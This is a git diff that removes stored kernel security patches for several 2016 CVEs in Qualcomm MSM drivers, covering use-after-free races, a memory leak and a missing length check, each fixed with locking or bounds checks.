-diff --git a/drivers/video/fbdev/msm/mdss_mdp_layer.c b/drivers/video/fbdev/msm/mdss_mdp_layer.c
-index 20fcc26..036e4e3 100644
---- a/drivers/video/fbdev/msm/mdss_mdp_layer.c
-+++ b/drivers/video/fbdev/msm/mdss_mdp_layer.c
-@@ -2470,16 +2470,20 @@ validate_exit:
- 	mutex_lock(&mdp5_data->list_lock);
- 	list_for_each_entry_safe(pipe, tmp, &mdp5_data->pipes_used, list) {
- 		if (IS_ERR_VALUE(ret)) {
--			if ((pipe->ndx & rec_release_ndx[0]) ||
--			    (pipe->ndx & rec_release_ndx[1])) {
-+			if (((pipe->ndx & rec_release_ndx[0]) &&
-+					(pipe->multirect.num == 0)) ||
-+				((pipe->ndx & rec_release_ndx[1]) &&
-+					(pipe->multirect.num == 1))) {
- 				mdss_mdp_smp_unreserve(pipe);
- 				pipe->params_changed = 0;
- 				pipe->dirty = true;
- 				if (!list_empty(&pipe->list))
- 					list_del_init(&pipe->list);
- 				mdss_mdp_pipe_destroy(pipe);
--			} else if ((pipe->ndx & rec_destroy_ndx[0]) ||
--				   (pipe->ndx & rec_destroy_ndx[1])) {
-+			} else if (((pipe->ndx & rec_destroy_ndx[0]) &&
-+						(pipe->multirect.num == 0)) ||
-+					((pipe->ndx & rec_destroy_ndx[1]) &&
-+						(pipe->multirect.num == 1))) {
- 				/*
- 				 * cleanup/destroy list pipes should move back
- 				 * to destroy list. Next/current kickoff cycle
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10287/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10287/ANY/0001.patch
deleted file mode 100644
index 5b96ada4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10287/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 937bc9e644180e258c68662095861803f7ba4ded Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Mon, 23 Jan 2017 13:15:58 -0800
-Subject: ASoC: msm: qdsp6v2: completely deallocate on cal block creation
- failure
-
-Completely deallocate the cal block if creation fails to ensure no
-memory leaks are present.
-
-CRs-Fixed: 1112751
-Change-Id: I76916c8b3f7e8e9b864dc39dab96f7d330774473
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/audio_cal_utils.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/audio_cal_utils.c b/sound/soc/msm/qdsp6v2/audio_cal_utils.c
-index 75af648..b54cde4 100644
---- a/sound/soc/msm/qdsp6v2/audio_cal_utils.c
-+++ b/sound/soc/msm/qdsp6v2/audio_cal_utils.c
-@@ -607,7 +607,6 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type,
- 	}
- 
- 	INIT_LIST_HEAD(&cal_block->list);
--	list_add_tail(&cal_block->list, &cal_type->cal_blocks);
- 
- 	cal_block->map_data.ion_map_handle = basic_cal->cal_data.mem_handle;
- 	if (basic_cal->cal_data.mem_handle > 0) {
-@@ -639,6 +638,7 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type,
- 		goto err;
- 	}
- 	cal_block->buffer_number = basic_cal->cal_hdr.buffer_number;
-+	list_add_tail(&cal_block->list, &cal_type->cal_blocks);
- 	pr_debug("%s: created block for cal type %d, buf num %d, map handle %d, map size %zd paddr 0x%pK!\n",
- 		__func__, cal_type->info.reg.cal_type,
- 		cal_block->buffer_number,
-@@ -648,6 +648,8 @@ static struct cal_block_data *create_cal_block(struct cal_type_data *cal_type,
- done:
- 	return cal_block;
- err:
-+	kfree(cal_block->cal_info);
-+	kfree(cal_block->client_info);
- 	kfree(cal_block);
- 	cal_block = NULL;
- 	return cal_block;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10288/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10288/ANY/0001.patch
deleted file mode 100644
index a4294fff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10288/ANY/0001.patch
+++ /dev/null
@@ -1,206 +0,0 @@
-From db2cdc95204bc404f03613d5dd7002251fb33660 Mon Sep 17 00:00:00 2001
-From: Ankit Sharma <ansharma@codeaurora.org>
-Date: Thu, 9 Feb 2017 16:23:09 +0530
-Subject: leds: qpnp-flash: Fix Use-after-free(UAF) for debugfs
-
-Fix UAF where two threads can open and close the same file. Second
-open will cause the private data for the first file to be overwritten.
-When the first file is closed and the private data is freed, this makes
-the now-shared private data OOB for the second thread.
-
-CRs-Fixed: 1109763
-Change-Id: I1c4618d5be99e140abf0f3ea0d7f485897db5ab2
-Signed-off-by: Ankit Sharma <ansharma@codeaurora.org>
----
- drivers/leds/leds-qpnp-flash.c | 82 +++++++++++++++++++++++++++---------------
- 1 file changed, 54 insertions(+), 28 deletions(-)
-
-diff --git a/drivers/leds/leds-qpnp-flash.c b/drivers/leds/leds-qpnp-flash.c
-index 56ba8f5..ec4b4e7 100644
---- a/drivers/leds/leds-qpnp-flash.c
-+++ b/drivers/leds/leds-qpnp-flash.c
-@@ -225,11 +225,13 @@ struct flash_led_platform_data {
- };
- 
- struct qpnp_flash_led_buffer {
--	struct mutex debugfs_lock; /* Prevent thread concurrency */
--	size_t rpos;
--	size_t wpos;
--	size_t len;
--	char data[0];
-+	struct		mutex debugfs_lock; /* Prevent thread concurrency */
-+	size_t		rpos;
-+	size_t		wpos;
-+	size_t		len;
-+	struct		qpnp_flash_led *led;
-+	u32		buffer_cnt;
-+	char		data[0];
- };
- 
- /*
-@@ -247,10 +249,8 @@ struct qpnp_flash_led {
- 	struct workqueue_struct		*ordered_workq;
- 	struct qpnp_vadc_chip		*vadc_dev;
- 	struct mutex			flash_led_lock;
--	struct qpnp_flash_led_buffer	*log;
- 	struct dentry			*dbgfs_root;
- 	int				num_leds;
--	u32				buffer_cnt;
- 	u16				base;
- 	u16				current_addr;
- 	u16				current2_addr;
-@@ -282,10 +282,10 @@ static int flash_led_dbgfs_file_open(struct qpnp_flash_led *led,
- 	log->wpos = 0;
- 	log->len = logbufsize - sizeof(*log);
- 	mutex_init(&log->debugfs_lock);
--	led->log = log;
-+	log->led = led;
- 
--	led->buffer_cnt = 1;
--	file->private_data = led;
-+	log->buffer_cnt = 1;
-+	file->private_data = log;
- 
- 	return 0;
- }
-@@ -299,12 +299,12 @@ static int flash_led_dfs_open(struct inode *inode, struct file *file)
- 
- static int flash_led_dfs_close(struct inode *inode, struct file *file)
- {
--	struct qpnp_flash_led *led = file->private_data;
-+	struct qpnp_flash_led_buffer *log = file->private_data;
- 
--	if (led && led->log) {
-+	if (log) {
- 		file->private_data = NULL;
--		mutex_destroy(&led->log->debugfs_lock);
--		kfree(led->log);
-+		mutex_destroy(&log->debugfs_lock);
-+		kfree(log);
- 	}
- 
- 	return 0;
-@@ -333,15 +333,21 @@ static int print_to_log(struct qpnp_flash_led_buffer *log,
- 
- static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- 					size_t count, loff_t *ppos) {
--	struct qpnp_flash_led *led = fp->private_data;
--	struct qpnp_flash_led_buffer *log = led->log;
-+	struct qpnp_flash_led_buffer *log = fp->private_data;
-+	struct qpnp_flash_led *led;
- 	u8 val;
- 	int rc = 0;
- 	size_t len;
- 	size_t ret;
- 
-+	if (!log) {
-+		pr_err("error: file private data is NULL\n");
-+		return -EFAULT;
-+	}
-+	led = log->led;
-+
- 	mutex_lock(&log->debugfs_lock);
--	if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+	if ((log->rpos >= log->wpos && log->buffer_cnt == 0) ||
- 			((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
- 		goto unlock_mutex;
- 
-@@ -353,7 +359,7 @@ static ssize_t flash_led_dfs_latched_reg_read(struct file *fp, char __user *buf,
- 				INT_LATCHED_STS(led->base), rc);
- 		goto unlock_mutex;
- 	}
--	led->buffer_cnt--;
-+	log->buffer_cnt--;
- 
- 	rc = print_to_log(log, "0x%05X ", INT_LATCHED_STS(led->base));
- 	if (rc == 0)
-@@ -388,18 +394,24 @@ unlock_mutex:
- 
- static ssize_t flash_led_dfs_fault_reg_read(struct file *fp, char __user *buf,
- 					size_t count, loff_t *ppos) {
--	struct qpnp_flash_led *led = fp->private_data;
--	struct qpnp_flash_led_buffer *log = led->log;
-+	struct qpnp_flash_led_buffer *log = fp->private_data;
-+	struct qpnp_flash_led *led;
- 	int rc = 0;
- 	size_t len;
- 	size_t ret;
- 
-+	if (!log) {
-+		pr_err("error: file private data is NULL\n");
-+		return -EFAULT;
-+	}
-+	led = log->led;
-+
- 	mutex_lock(&log->debugfs_lock);
--	if ((log->rpos >= log->wpos && led->buffer_cnt == 0) ||
-+	if ((log->rpos >= log->wpos && log->buffer_cnt == 0) ||
- 			((log->len - log->wpos) < MIN_BUFFER_WRITE_LEN))
- 		goto unlock_mutex;
- 
--	led->buffer_cnt--;
-+	log->buffer_cnt--;
- 
- 	rc = print_to_log(log, "0x%05X ", FLASH_LED_FAULT_STATUS(led->base));
- 	if (rc == 0)
-@@ -441,10 +453,17 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- 	int data;
- 	size_t ret = 0;
- 
--	struct qpnp_flash_led *led = file->private_data;
-+	struct qpnp_flash_led_buffer *log = file->private_data;
-+	struct qpnp_flash_led *led;
- 	char *kbuf;
- 
--	mutex_lock(&led->log->debugfs_lock);
-+	if (!log) {
-+		pr_err("error: file private data is NULL\n");
-+		return -EFAULT;
-+	}
-+	led = log->led;
-+
-+	mutex_lock(&log->debugfs_lock);
- 	kbuf = kmalloc(count + 1, GFP_KERNEL);
- 	if (!kbuf) {
- 		ret = -ENOMEM;
-@@ -479,7 +498,7 @@ static ssize_t flash_led_dfs_fault_reg_enable(struct file *file,
- free_buf:
- 	kfree(kbuf);
- unlock_mutex:
--	mutex_unlock(&led->log->debugfs_lock);
-+	mutex_unlock(&log->debugfs_lock);
- 	return ret;
- }
- 
-@@ -491,10 +510,17 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- 	int cnt = 0;
- 	int data;
- 	size_t ret = 0;
--	struct qpnp_flash_led *led = file->private_data;
-+	struct qpnp_flash_led_buffer *log = file->private_data;
-+	struct qpnp_flash_led *led;
- 	char *kbuf;
- 
--	mutex_lock(&led->log->debugfs_lock);
-+	if (!log) {
-+		pr_err("error: file private data is NULL\n");
-+		return -EFAULT;
-+	}
-+	led = log->led;
-+
-+	mutex_lock(&log->debugfs_lock);
- 	kbuf = kmalloc(count + 1, GFP_KERNEL);
- 	if (!kbuf) {
- 		ret = -ENOMEM;
-@@ -528,7 +554,7 @@ static ssize_t flash_led_dfs_dbg_enable(struct file *file,
- free_buf:
- 	kfree(kbuf);
- unlock_mutex:
--	mutex_unlock(&led->log->debugfs_lock);
-+	mutex_unlock(&log->debugfs_lock);
- 	return ret;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10289/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2016-10289/3.18/0001.patch
deleted file mode 100644
index b8aa3cce..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10289/3.18/0001.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From a604e6f3889ccc343857532b63dea27603381816 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Tue, 31 Jan 2017 12:07:10 -0800
-Subject: crypto: msm: check length before copying to buf in _debug_stats_read
-
-Make sure that `len` is not larger than `count` before copying data
-to userspace `buf` in _debug_stats_read().
-
-Change-Id: Iafb7cfa3828653f8c28183c812797c3d9a183da1
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/ota_crypto.c | 6 +++---
- drivers/crypto/msm/qcedev.c     | 4 ++--
- drivers/crypto/msm/qcrypto.c    | 6 +++---
- 3 files changed, 8 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/crypto/msm/ota_crypto.c b/drivers/crypto/msm/ota_crypto.c
-index 8aa0d04..416623f 100644
---- a/drivers/crypto/msm/ota_crypto.c
-+++ b/drivers/crypto/msm/ota_crypto.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -884,8 +884,8 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
- 	int len;
- 
- 	len = _disp_stats();
--
--	rc = simple_read_from_buffer((void __user *) buf, len,
-+	if (len <= count)
-+		rc = simple_read_from_buffer((void __user *) buf, len,
- 			ppos, (void *) _debug_read_buf, len);
- 
- 	return rc;
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index a629c62..5ce87a6e 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1987,9 +1987,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
- 
- 	len = _disp_stats(qcedev);
- 
--	rc = simple_read_from_buffer((void __user *) buf, len,
-+	if (len <= count)
-+		rc = simple_read_from_buffer((void __user *) buf, len,
- 			ppos, (void *) _debug_read_buf, len);
--
- 	return rc;
- }
- 
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index 3324c9d..dd4443f 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -1,6 +1,6 @@
- /* Qualcomm Crypto driver
-  *
-- * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -5742,9 +5742,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
- 
- 	len = _disp_stats(qcrypto);
- 
--	rc = simple_read_from_buffer((void __user *) buf, len,
-+	if (len <= count)
-+		rc = simple_read_from_buffer((void __user *) buf, len,
- 			ppos, (void *) _debug_read_buf, len);
--
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10289/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2016-10289/4.4/0002.patch
deleted file mode 100644
index bf53d873..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10289/4.4/0002.patch
+++ /dev/null
@@ -1,80 +0,0 @@
-From 08a969c0e4c399df047c8055ac11a19e124500ed Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Tue, 31 Jan 2017 12:07:10 -0800
-Subject: crypto: msm: check length before copying to buf in _debug_stats_read
-
-Make sure that `len` is not larger than `count` before copying data
-to userspace `buf` in _debug_stats_read().
-
-Change-Id: Iafb7cfa3828653f8c28183c812797c3d9a183da1
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/ota_crypto.c | 6 +++---
- drivers/crypto/msm/qcedev.c     | 4 ++--
- drivers/crypto/msm/qcrypto.c    | 6 +++---
- 3 files changed, 8 insertions(+), 8 deletions(-)
-
-diff --git a/drivers/crypto/msm/ota_crypto.c b/drivers/crypto/msm/ota_crypto.c
-index 9b4a001..674913c 100644
---- a/drivers/crypto/msm/ota_crypto.c
-+++ b/drivers/crypto/msm/ota_crypto.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2014,2017 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -880,8 +880,8 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
- 	int len;
- 
- 	len = _disp_stats();
--
--	rc = simple_read_from_buffer((void __user *) buf, len,
-+	if (len <= count)
-+		rc = simple_read_from_buffer((void __user *) buf, len,
- 			ppos, (void *) _debug_read_buf, len);
- 
- 	return rc;
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index a629c62..5ce87a6e 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1987,9 +1987,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
- 
- 	len = _disp_stats(qcedev);
- 
--	rc = simple_read_from_buffer((void __user *) buf, len,
-+	if (len <= count)
-+		rc = simple_read_from_buffer((void __user *) buf, len,
- 			ppos, (void *) _debug_read_buf, len);
--
- 	return rc;
- }
- 
-diff --git a/drivers/crypto/msm/qcrypto.c b/drivers/crypto/msm/qcrypto.c
-index a898dbc..893b0b6 100644
---- a/drivers/crypto/msm/qcrypto.c
-+++ b/drivers/crypto/msm/qcrypto.c
-@@ -1,6 +1,6 @@
- /* Qualcomm Crypto driver
-  *
-- * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -5419,9 +5419,9 @@ static ssize_t _debug_stats_read(struct file *file, char __user *buf,
- 
- 	len = _disp_stats(qcrypto);
- 
--	rc = simple_read_from_buffer((void __user *) buf, len,
-+	if (len <= count)
-+		rc = simple_read_from_buffer((void __user *) buf, len,
- 			ppos, (void *) _debug_read_buf, len);
--
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10290/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10290/ANY/0001.patch
deleted file mode 100644
index ac233c61..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10290/ANY/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From a5e46d8635a2e28463b365aacdeab6750abd0d49 Mon Sep 17 00:00:00 2001
-From: Sahitya Tummala <stummala@codeaurora.org>
-Date: Fri, 3 Feb 2017 13:24:19 +0530
-Subject: uio: fix potential use after free issue when accessing debug_buffer
-
-The variable debug_buffer is a global variable which is allocated
-and free'd when open/close is called on debugfs file -
-"/sys/kernel/debug/rmt_storage/info". The current code doesn't
-have locks to handle concurrent accesses to the above file.
-This results into use after free issue when debug_buffer is
-accessed by two threads at the same time. Fix this by adding
-a mutex lock to protect this global variable.
-
-Change-Id: I6bc3f0ae2d7fca3ca9fe8561612f5863b6c3268a
-Signed-off-by: Sahitya Tummala <stummala@codeaurora.org>
----
- drivers/uio/msm_sharedmem/sharedmem_qmi.c | 17 ++++++++++++++---
- 1 file changed, 14 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/uio/msm_sharedmem/sharedmem_qmi.c b/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-index 48fb17e..fd95dee 100644
---- a/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-+++ b/drivers/uio/msm_sharedmem/sharedmem_qmi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2015, 2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -223,6 +223,7 @@ static int sharedmem_qmi_req_cb(struct qmi_handle *handle, void *conn_h,
- #define DEBUG_BUF_SIZE (2048)
- static char *debug_buffer;
- static u32 debug_data_size;
-+static struct mutex dbg_buf_lock;	/* mutex for debug_buffer */
- 
- static ssize_t debug_read(struct file *file, char __user *buf,
- 			  size_t count, loff_t *file_pos)
-@@ -279,21 +280,29 @@ static int debug_open(struct inode *inode, struct file *file)
- {
- 	u32 buffer_size;
- 
--	if (debug_buffer != NULL)
-+	mutex_lock(&dbg_buf_lock);
-+	if (debug_buffer != NULL) {
-+		mutex_unlock(&dbg_buf_lock);
- 		return -EBUSY;
-+	}
- 	buffer_size = DEBUG_BUF_SIZE;
- 	debug_buffer = kzalloc(buffer_size, GFP_KERNEL);
--	if (debug_buffer == NULL)
-+	if (debug_buffer == NULL) {
-+		mutex_unlock(&dbg_buf_lock);
- 		return -ENOMEM;
-+	}
- 	debug_data_size = fill_debug_info(debug_buffer, buffer_size);
-+	mutex_unlock(&dbg_buf_lock);
- 	return 0;
- }
- 
- static int debug_close(struct inode *inode, struct file *file)
- {
-+	mutex_lock(&dbg_buf_lock);
- 	kfree(debug_buffer);
- 	debug_buffer = NULL;
- 	debug_data_size = 0;
-+	mutex_unlock(&dbg_buf_lock);
- 	return 0;
- }
- 
-@@ -324,6 +333,7 @@ static void debugfs_init(void)
- {
- 	struct dentry *f_ent;
- 
-+	mutex_init(&dbg_buf_lock);
- 	dir_ent = debugfs_create_dir("rmt_storage", NULL);
- 	if (IS_ERR(dir_ent)) {
- 		pr_err("Failed to create debug_fs directory\n");
-@@ -352,6 +362,7 @@ static void debugfs_init(void)
- static void debugfs_exit(void)
- {
- 	debugfs_remove_recursive(dir_ent);
-+	mutex_destroy(&dbg_buf_lock);
- }
- 
- static void sharedmem_qmi_svc_recv_msg(struct work_struct *work)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10291/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-10291/3.10/0001.patch
deleted file mode 100644
index 6e74db35..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10291/3.10/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From c2b026dcd498c93a789b6b84dbe9a73c4a9d8135 Mon Sep 17 00:00:00 2001
-From: Dilip Kota <dkota@codeaurora.org>
-Date: Mon, 21 Mar 2016 11:28:51 +0530
-Subject: slim-msm: Synchronize SSR callbacks
-
-Subsystem will restart within short timeframe.
-Synchronise subsytem up/down callback notifications
-to avoid functionality failures.
-Use mutex locks to achieve synchronization.
-
-Change-Id: I5881c7d468507bb8402a2e9f8178b9c31e57e8a5
-Signed-off-by: Dilip Kota <dkota@codeaurora.org>
----
- drivers/slimbus/slim-msm-ngd.c | 5 +++++
- drivers/slimbus/slim-msm.h     | 3 ++-
- 2 files changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/slimbus/slim-msm-ngd.c b/drivers/slimbus/slim-msm-ngd.c
-index 5c2c9a6..8c3a184 100644
---- a/drivers/slimbus/slim-msm-ngd.c
-+++ b/drivers/slimbus/slim-msm-ngd.c
-@@ -1446,11 +1446,13 @@ static void ngd_adsp_down(struct msm_slim_ctrl *dev)
- 	struct slim_controller *ctrl = &dev->ctrl;
- 	struct slim_device *sbdev;
- 
-+	mutex_lock(&dev->ssr_lock);
- 	ngd_slim_enable(dev, false);
- 	/* device up should be called again after SSR */
- 	list_for_each_entry(sbdev, &ctrl->devs, dev_list)
- 		slim_report_absent(sbdev);
- 	SLIM_INFO(dev, "SLIM ADSP SSR (DOWN) done\n");
-+	mutex_unlock(&dev->ssr_lock);
- }
- 
- static void ngd_adsp_up(struct work_struct *work)
-@@ -1459,7 +1461,9 @@ static void ngd_adsp_up(struct work_struct *work)
- 		container_of(work, struct msm_slim_qmi, ssr_up);
- 	struct msm_slim_ctrl *dev =
- 		container_of(qmi, struct msm_slim_ctrl, qmi);
-+	mutex_lock(&dev->ssr_lock);
- 	ngd_slim_enable(dev, true);
-+	mutex_unlock(&dev->ssr_lock);
- }
- 
- static ssize_t show_mask(struct device *device, struct device_attribute *attr,
-@@ -1623,6 +1627,7 @@ static int ngd_slim_probe(struct platform_device *pdev)
- 	init_completion(&dev->reconf);
- 	init_completion(&dev->ctrl_up);
- 	mutex_init(&dev->tx_lock);
-+	mutex_init(&dev->ssr_lock);
- 	spin_lock_init(&dev->tx_buf_lock);
- 	spin_lock_init(&dev->rx_lock);
- 	dev->ee = 1;
-diff --git a/drivers/slimbus/slim-msm.h b/drivers/slimbus/slim-msm.h
-index dbb125d..0b4c4d3 100644
---- a/drivers/slimbus/slim-msm.h
-+++ b/drivers/slimbus/slim-msm.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -284,6 +284,7 @@ struct msm_slim_ctrl {
- 	struct clk		*rclk;
- 	struct clk		*hclk;
- 	struct mutex		tx_lock;
-+	struct mutex		ssr_lock;
- 	spinlock_t		tx_buf_lock;
- 	u8			pgdla;
- 	enum msm_slim_msgq	use_rx_msgqs;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10291/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-10291/3.18/0002.patch
deleted file mode 100644
index aaa8a0ff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10291/3.18/0002.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From a225074c0494ca8125ca0ac2f9ebc8a2bd3612de Mon Sep 17 00:00:00 2001
-From: Dilip Kota <dkota@codeaurora.org>
-Date: Mon, 21 Mar 2016 11:28:51 +0530
-Subject: slim-msm: Synchronize SSR callbacks
-
-Subsystem will restart within short timeframe.
-Synchronise subsytem up/down callback notifications
-to avoid functionality failures.
-Use mutex locks to achieve synchronization.
-
-Change-Id: I5881c7d468507bb8402a2e9f8178b9c31e57e8a5
-Signed-off-by: Dilip Kota <dkota@codeaurora.org>
----
- drivers/slimbus/slim-msm-ngd.c | 5 +++++
- drivers/slimbus/slim-msm.h     | 3 ++-
- 2 files changed, 7 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/slimbus/slim-msm-ngd.c b/drivers/slimbus/slim-msm-ngd.c
-index 3684984..1328e76 100644
---- a/drivers/slimbus/slim-msm-ngd.c
-+++ b/drivers/slimbus/slim-msm-ngd.c
-@@ -1449,11 +1449,13 @@ static void ngd_adsp_down(struct msm_slim_ctrl *dev)
- 	struct slim_controller *ctrl = &dev->ctrl;
- 	struct slim_device *sbdev;
- 
-+	mutex_lock(&dev->ssr_lock);
- 	ngd_slim_enable(dev, false);
- 	/* device up should be called again after SSR */
- 	list_for_each_entry(sbdev, &ctrl->devs, dev_list)
- 		slim_report_absent(sbdev);
- 	SLIM_INFO(dev, "SLIM ADSP SSR (DOWN) done\n");
-+	mutex_unlock(&dev->ssr_lock);
- }
- 
- static void ngd_adsp_up(struct work_struct *work)
-@@ -1462,7 +1464,9 @@ static void ngd_adsp_up(struct work_struct *work)
- 		container_of(work, struct msm_slim_qmi, ssr_up);
- 	struct msm_slim_ctrl *dev =
- 		container_of(qmi, struct msm_slim_ctrl, qmi);
-+	mutex_lock(&dev->ssr_lock);
- 	ngd_slim_enable(dev, true);
-+	mutex_unlock(&dev->ssr_lock);
- }
- 
- static ssize_t show_mask(struct device *device, struct device_attribute *attr,
-@@ -1626,6 +1630,7 @@ static int ngd_slim_probe(struct platform_device *pdev)
- 	init_completion(&dev->reconf);
- 	init_completion(&dev->ctrl_up);
- 	mutex_init(&dev->tx_lock);
-+	mutex_init(&dev->ssr_lock);
- 	spin_lock_init(&dev->tx_buf_lock);
- 	spin_lock_init(&dev->rx_lock);
- 	dev->ee = 1;
-diff --git a/drivers/slimbus/slim-msm.h b/drivers/slimbus/slim-msm.h
-index 86d2606..7859d1e 100644
---- a/drivers/slimbus/slim-msm.h
-+++ b/drivers/slimbus/slim-msm.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -284,6 +284,7 @@ struct msm_slim_ctrl {
- 	struct clk		*rclk;
- 	struct clk		*hclk;
- 	struct mutex		tx_lock;
-+	struct mutex		ssr_lock;
- 	spinlock_t		tx_buf_lock;
- 	u8			pgdla;
- 	enum msm_slim_msgq	use_rx_msgqs;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10293/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10293/ANY/0001.patch
deleted file mode 100644
index 04ca3e4c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10293/ANY/0001.patch
+++ /dev/null
@@ -1,184 +0,0 @@
-From 2469d5374745a2228f774adbca6fb95a79b9047f Mon Sep 17 00:00:00 2001
-From: Yang Xu <yangxu@codeaurora.org>
-Date: Thu, 29 Oct 2015 17:46:15 +0800
-Subject: msm: mdss: Add debugfs support for panel command data type
-
-Register debugfs node to read from and write to the panel command
-data type. The default data type is DCS_LONG_WRITE 0x39.
-
-Give following command in adb shell to read panel register:
-	cat /sys/kernel/debug/mdp/panel_cmd_data_type
-To write panel command data type:
-	echo "command_data_type" >
-		/sys/kernel/debug/mdp/panel_cmd_data_type
-
-Change-Id: I6dbe5bccb3142e93400825eddf7f05180acfc710
-Signed-off-by: Yang Xu <yangxu@codeaurora.org>
----
- drivers/video/msm/mdss/mdss_debug.c | 73 ++++++++++++++++++++++---------------
- drivers/video/msm/mdss/mdss_debug.h |  3 +-
- 2 files changed, 46 insertions(+), 30 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index eaeccac..13d2b16 100644
---- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2009-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
